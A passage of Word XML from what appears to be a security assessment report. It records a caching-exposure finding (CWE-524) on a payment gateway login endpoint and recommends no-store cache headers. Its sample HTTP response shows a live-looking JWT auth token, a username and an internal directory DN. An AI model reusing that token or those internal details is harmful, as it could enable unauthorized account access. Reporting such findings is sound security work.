                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>4.7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="72EE6982" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="230336C7"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4D59390C" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-524: Information Exposure Through Caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="51109232" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F528C80"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CE4D01B" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0B25604F" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="03C561B5"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4642128D" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FCE9518" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In the HTTP request, the application is setting Cache-Control to no-cache. However setting to no</w:t>
            </w:r>
            <w:r w:rsidR="00E623F7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-store will resolve the issue. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="633AACCF" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00D45A38">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E623F7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>no-cache</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E623F7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D45A38">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Forces caches to submit the request to the origin server for validation before releasing a cached copy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D045B09" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00397EF0" w:rsidRDefault="00D45A38" w:rsidP="00D45A38">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E623F7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>no-store</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E623F7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D45A38">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The cache should not store anything about the client request or server response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="27C3A7DD" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EC69BA"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA0D2CC" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Applications should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content: - Cache-control: no-store - Pragma: no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7263BB39" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="180B9544"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0F6A0C3A" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0B3FE053" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771275B6" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The below HTTP request and response is an example of sensitive data being store</w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">local cache. While Cache-Control is being set in the headers, its utilization of the “no-cache” option is still allowing for data to be stored after validation. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A3AB8A3" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D45A38">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D45A38" w:rsidRPr="00D45A38" w14:paraId="7259305B" w14:textId="77777777" w:rsidTr="00D45A38">
              <w:trPr>
                <w:trHeight w:val="1273"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="59C9FFE2" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/login/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>generateTokenWithSMHeaders</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="356A638F" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4D7A325A" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="63EA7285" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Pragma: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="343851A0" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6FA043E2" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="62A10B9E" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D45A38">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D45A38" w:rsidRPr="00D45A38" w14:paraId="3F6B76D5" w14:textId="77777777" w:rsidTr="00D45A38">
              <w:trPr>
                <w:trHeight w:val="2079"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="57479047" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6F76D280" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Wed, 22 May 2019 19:32:27 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3C76691E" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="25AB7E0A" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 483</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3F0F0CD1" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"authToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJzcmloYXJpcHJhc2F0aDUzLWdiZGFwcHNlY3VyZSIsImlhdCI6MTU1ODU1MzU0OH0.nvCu0Me65uIjorHx1BOvEdQ2YBr5PJIwzuqmDNY6mnI","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>userName":"srihariprasath53</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>userDn":"CN=srihariprasath53</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D45A38">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,OU=ePayments,OU=webUsers,OU=usersAndGroups,DC=webdevad,DC=wellpoint,DC=com","orgType":"WHIP_TPS","orgName":"srihari","aciFlag":true,"recurringFlag":true,"relShpType":null,"relShpName":null,"userRole":null,"firstName":null,"lastName":null,"authFlag":true,"rules":null}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="18BA991B" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
